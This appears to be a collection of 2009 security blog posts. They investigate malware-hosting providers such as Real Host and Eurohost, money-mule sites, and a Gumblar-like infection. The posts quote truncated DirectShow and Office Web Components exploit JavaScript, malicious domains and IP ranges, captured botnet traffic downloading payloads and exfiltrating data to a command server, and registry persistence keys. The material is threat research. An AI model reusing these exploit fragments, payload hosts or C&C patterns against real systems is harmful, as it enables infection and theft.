View the top 50

Download the report

Here’s a brief look at the top 10 bad hosts:

To get to the root of the problem, Afilias (the company responsible for .info domains) and GoDaddy (the registrar) were involved to investigate. They quickly blocked the offending domains once it was clear they were hostile. What was very surprising was the end result, GoDaddy removed 711 domains that were affiliated with this attack!

Attack scripts:

hxxp://us.hn0.info/f/1/ie.html

http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372

hxxp://us.hn0.info/f/1/ff.html

http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360

hxxp://us.hn0.info/f/1/cosplay.swf
http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&type=swf

Shellcode:
http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262

The domains:

Rather than rehash the purpose for the report, here’s an excerpt from the abstract:

MALfi “A Silent Threat”

What is it all about, MALfi? A blended threat currently detected on around 350,000 websites &
Internet servers. One major purpose is to establish, “use once and throw away” disposable
botnets for spam, phishing, DDoS and exploits.
Full Report (public version) download PDF – hostexploit Download page = http://bit.ly/eoO4C

Abstract / Press Release

MALfi is a holistic and descriptive term applied to adequately describe the recent blended attack
utilized by hackers and cyber criminals to compromise websites and servers. This is
combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack),
and RCE (remote code execution).

Conservative estimates over recent months indicate around 350,000 affected websites and
servers worldwide. hostexploit and associated researchers have tracked 103,351 attacks,
involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 ASNs
involved.

Check out the report for our research and findings. A more detailed version will also be made available to key members of the security and law enforcement communities.

The following message was discovered in a HTML comment section inside a hostile script. I found the page hosting the script by searching for a string inside an ANI exploit on Google in May 2007.

天高云淡，正宜一马奔腾，青春年少，我自纵横驰骋，这是一个只承认强者的时代，然而学习正是赋予了我们作强者的资本，物竟天择，适者生存，只有不断的学习我们才不会被社所会淘汰，我们才会逐渐变强，珍惜你生命中的每一分钟无学习，你会发现平凡的你一样很优秀，当你在风烛残年的那一刻时，面对你的朋友，爱人，儿子，不会因碌碌无为而羞耻，不会因年华虚度而悔恨，你会发现当你,把你的你的青春变的更加劲直和充满活力的时候，曾经无奈与迷茫的你，现在是那样的精彩与辉煌黑域战盟一个，和平，博爱，互助，不会有任何的技术歧视的技术团体，诚心邀请您的加盟楚蓝枫QQ4998XXXXX

This translates to:

It is a clear day, suitable for horse gallops.  The youth is young; he can advance freely and quickly.

This is the era which appreciates only the strong, the survival of the fittest; yet study is the capital which empowers us to become strong. Only through continuous learning we will not be eliminated, we will become stronger and stronger. Cherish every minute of life with learning, you will find yourself as extraordinary as others. When you become old, in the face of your friends, wife, son, you will not feel shame and regret because you did not waste time when you were young; you will find yourself so wonderful when you contributed your vibrant youth into something meaningful, and changed yourself from once a helpless and confused you to someone brilliant.QQ4998XXXXX

Interesting message they were trying to get across isn’t it?

Here’s an excerpt from the report, to bad they didn’t credit our work

“Real Host was disconnected by its upstream providers on 1 August 2009. The impact was immediately felt, as can be seen in Figure 1, where spam volumes dropped briefly by as much as 38% in the subsequent 48-hour period.

Much of this spam was linked to the Cutwail botnet, currently one of the largest botnets and responsible for approximately 15-20% of all spam. Its activity levels fell by as much as 90% when Real Host was taken offline, but quickly recovered in a matter of days.”

The story was first published by the Financial Times of London

With follow up stories from:

Network World

The Inquirer

CIO Magazine

Information Security Magazine

Sunbelt Software

Computer World UK

And many more!

The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. There are 2 payloads dropped on compromised hosts at the end of the attacks that steal banking credentials and send SPAM. These payloads are delivered by multiple exploits including  an unpatched 0day vulnerability and a previously unpatched one.

Directshow – MS09-028 (previously a 0day, patched recently)

function directshow()
{
var shellcode=unescape(”%uC033….

obj.data=’./directshow.php’;
obj.classid=’clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’;

Microsoft Office Web Components (unpatched 0day)

function spreadsheet()
{
try
{
var objspread=new ActiveXObject(’OWC10.Spreadsheet’);
}

After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia it quickly became apparent how bad this host is. A quick search leads to a blog written by Dynamoo where the activities of this host are first uncovered. Delving deeper into this provider  it is apparent that they are a major hub of cybercrime activity which we will discuss further. This post has been prepared in conjunction with Jart Armin from HostExploit.com. Jart will present a higher level view of Real Host’s activities in relation to other entities and most interestingly how they related to the former Russian Business Network (RBN).

It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.

Observed Hostile Activity:

• Exploits including unpatched (or soon to be patched) 0days
• Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan
• Phishing sites
• Moneymule recruitment sites
• Botnet Command and Control servers
• Hosting of cybercrime websites – Iframe programs
• Distributing licensed software (Warez)

Real Host has 3 /28 IP blocks (48 IPs) that they get from Junik (AS8206), these are:

inetnum: 213.182.197.0 – 213.182.197.15
netname: Real_Host_NET3
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.224 – 213.182.197.239
netname: Real_Host_NET1
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.240 – 213.182.197.255
netname: Real_Host_NET2
descr: Real Host
country: LV
abuse-mailbox: abusemailhost@gmail.com

The first indication of suspicious activity is the use of gmail addresses as abuse contacts.

Next, here is data from my security tools showing attacks and the dates associated with them:

A little manual investigation led me to the following:

The domain I found most amusing was botnet.su, the attackers clearly aren’t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.

Zeus seems to be one of the most common threats being hosted from Real Host’s network. According to recent information released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.

To begin, let’s look at the money mule sites the Barwells Group and NewskyAG, here is an excerpt from the link included above:

BarwellsGroup

“During the trial period (1 month), you will be paid 2000 USD per month
while working on average 3 hours per day, Monday-Friday, plus 5
commission from every transactions or task received and processed. The
salary will be sent in the form of wire transfer directly to your
account. After the trial period your base pay salary will go up to
3,500USD per month, plus 5 commission.”

Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!

NewskyAG

Not only does this domain operate a money mule scam, it also ran a Zeus C&C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:

Q: “Anyone ever heard of a company called NewSky Ag?”

A: “Yes I work for them from home and so far everything is ok but I’ve only been doing it about 2 months so if you have any more ? please let me know”

Next we have a phish for a Russian social networking site

Lastly lets look at iframepartners.com, the site is currently down however information is still available. The site pays malicious web admins to put iframes on their compromised websites. A colleague of mine was kind enough to translate the text from Russian (thanks Alex!). It reads:

1. A partner pays for iframe traffic, we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K depending on traffic quality

2. We accept only ads that generate more that 50K USA traffic

3. You are prohibited to install anything else with our iframe

4. Adult traffic is not welcomed

5. An account will be deleted without payout in case of detection of spam or worm traffic

6. We have been deleting accounts that are not active for few days

7. Cheaters and hit-boters, please don’t waste our time, look for other places

8. Payout twice a month, in the beginning and in the middle of month
Use XXX XXXXXX to contact us

Notice how adult sites, worms and spam traffic is not allowed? This is probably due to the fact that they are very noisy and easily spotted by security professionals.

This leads to another site called installing.cc. This site pays for installing malware onto compromised PCs.

Another interesting hit comes up from a design company called web-alfa.com. They designed an eye catching flash banner advertisement for the attackers.

The slides in the flash movie say:

Long-live substitution,

And software sale,

Referral system,

And other life enjoyments

For invitation and detailed information contact us via XXX XXXXXX

Clearly Real Host Ltd is hosting major cybercrime activity as a vast number of IPs in their space host malicious content. Several of the domains hosted with them were used by the former RBN. Real Host represents a major threat to individuals, business and the safety of the Internet ecosystem.

So this means my spare time has been mostly spent contributing to the next major report from the HostExploit team. Look for it in the coming weeks, it’s going to be very juicy

Another method I’d like to highlight is looking for password protect zip files. Like the transfer of executables, password protected zips are perfectly legitimate. Lets take Zeus as an example.

Zeus/Zbot/WSNpoem spreads both via web exploits and SPAM runs. In order to get the payload past AV detection, the malware author encrypts the file and provides the password in the body of the message. AV cannot scan within the archive and can only match on a specific signature for the encrypted archive itself.

There was one of these runs earlier this week (June 24th) which is easily detected by a signature that looks for password protected zips. You might think that a signature like this would generate a lot of events, and it does, however it is easy to sort through and find the attacks. The file name used in this attack was “djellow.zip”.  A quick search leads us to this article over at abuse.ch.

The messages were sent from a number of IPs, including:

95.25.108.154
95.24.3.119
89.248.207.69
88.227.199.86
86.105.126.142
85.100.177.112
84.92.85.139
84.204.112.15
84.104.97.35
83.5.144.32
78.176.8.64
78.166.216.115
78.161.81.160
78.158.51.103
77.77.15.208
77.255.254.214
76.175.144.40
72.179.5.10
71.124.158.42
209.239.38.24
201.22.7.148
201.15.77.229
201.0.136.67
200.68.63.226
200.56.79.179
190.175.133.38
189.78.200.43
188.47.4.252
187.14.9.68

The two worst offenders are Brazil and Turkey with 5 IPs each.

Attacks using password protected zips can now be identified and their sources uncovered without having to rely solely on exploit or attack related signatures. All that’s needed is a detective hat and knowledge of current threats.

Summary

This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end result are very similar. The objective of the attack is to:

Install a socks proxy
Install fake AV (System Security)
Steal FTP credentials
Send SPAM
Redirect search queries

What’s new? The attackers use updated and more stealthy code. They also introduce a component which fiddles with Terminal Services (RDP) although I’m not 100% sure why yet.

Details

Information on Websense’s site was sparse, but a quick google search for the first part of the domain they referenced in their alert yeilded the information I needed. The initial attack was coming from rnw.kz/index.php. This domain is on 91.212.65.133 which is hosted by Eurohost out of the Ukraine which I have run across many times before. I’ll probably post another article on these guys shortly.

inetnum: 91.212.65.0 - 91.212.65.255
netname: EUROHOST-NET
descr: Eurohost LLC
descr: Provider Local Registry
country: UA

This IP hosts many other domains associated with the attack:

sovi.tw
rmi.tw
orep.tw
molo.tw
dmr.tw

When connecting to rnw.kz, a series of redirects take place between the above noted domains. Cookies are created (probably so a victim is only infected once) to track victims and are passed onto the next domain. If the user has already visited the site, they are sent on to ask.com. The mighty wepawet was not sucessful in analysing the attack as it pointed me to ask.com

After using MalZilla to quickly decode the exploit code (discussed in WebSense’s Alert), the final payload was evident and resides at: http://orep.tw/pve/pics.php?id=[unique id] [VirusTotal] [Threat Expert].

A VM of mine was infected and after loading internet explorer the malware lit up and did it’s thing. I’ve submitted a few files to VT but to be honest I haven’t had to much time to investigate to cover everything.

Virustotal 1

Virustotal 2

Binary Downloads, Ads and C&C communication

Interesting notes:

User Agent: socks
HTTP server: nginx (commonly used by attackers)
C&C appears to be: trafficshop.tw
Version: 3.15.3
Some of the attacker’s SQL is visable: UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;

GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&sft=AAAAAAAAA&rvz1=41&rvz2=0002786062 HTTP/1.1

Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:25:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 1822
Content-Type: text/html

#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
#U;:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U7:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U?:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U=:FORUM ADVERTISING|——————————————–||[URL=http://www.best-med-shop.com]  ||Canadian medicine and pharmacy is most professional. Generic pills. High qulity and lowest price.||Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa…. [/url]|||http://www.best-med-shop.com||——————————————–%%

GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1

Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 251
Content-Type: text/html

#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
Array
(
[0] => 200704_socks.exe
[1] => 432128_sever.exe
[2] => 11264_ic.exe
)
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
.crc tmpl.

GET /n1.exe HTTP/1.1
User-Agent: Mozilla
Host: miosmschat.com

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Tue, 16 Jun 2009 23:34:57 GMT
Content-Type: application/octet-stream
Connection: close
Content-Length: 512830
Last-Modified: Tue, 16 Jun 2009 23:30:01 GMT
Accept-Ranges: bytes

Other interesting network traffic

GET /in.php?url=5&affid=02800 HTTP/1.1
Referrer: http://greatmarketingservices.com/
Accept: *//*
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows XP)
Host: greatmarketingservices.com
Connection: Keep-Alive
Cache-Control: no-cache

POST /socks/gate/r.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 125
Cache-Control: no-cache

s=0002804890612064add4936a533bbafe4f66456af0d214d0d8b7025665dbbcb84b1ff54d03fecq0d16129l0t1q1d2817l0t1q3d11521l0t1q9d7937l0t1HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 29
Content-Type: text/html

iogeelhchqhogmhgggdccnghdqdk

POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 78
Cache-Control: no-cache

CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…ya.ru/5/982HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html

POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 93
Cache-Control: no-cache

CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…AAAAAAAACI.050010026000300HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 50
Content-Type: text/html

Files & Reg Keys

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\sever.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: “C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98898116: “C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe”
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appiytt_Dlls: “nvbms”
HKLM\SOFTWARE\Classes\CLSID\{425882B0-B0BF-11CE-B59F-00AA006CB37D}\InProcServer32\: “C:\WINDOWS\system32\npp\ndisnpp.dll”

C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe (fake av)
C:\Documents and Settings\All Users\Application Data\18888124\18888124.glu (fake av)
C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe (fake av)
C:\Documents and Settings\All Users\Application Data\98898116.ini (fake av)
C:\Documents and Settings\user\Local Settings\Temp\izohore.bmp (fake av)
C:\Documents and Settings\user\Local Settings\Temp\TMP46.tmpC:\WINDOWS\system32\4311z.sc
C:\WINDOWS\system32\cxilanls
C:\WINDOWS\system32\nh4g.bbv
C:\WINDOWS\system32\nvbms.dll
C:\WINDOWS\system32\sfxzmtforum.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmt.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmtspm.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtwbmail.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sgr3.ge
C:\WINDOWS\system32\SOCKET2.DLL
C:\WINDOWS\system32\SOCKET2w.DLL
C:\WINDOWS\system32\SPORDER.DLL
C:\WINDOWS\system32\user32.DLL
C:\WINDOWS\system32\vrur
C:\WINDOWS\sever.exe
C:\WINDOWS\socks.exe (socks proxy)

Other notable behavior

The malware tries to overwrite user32.dll, triggering windows file protection. My VM bluescreened a couple times during analysis which means victims are probably suffering the same problem. The malware also installs winpcap and hides it’s presence by deleting various reg keys and the winpcap uninstaller.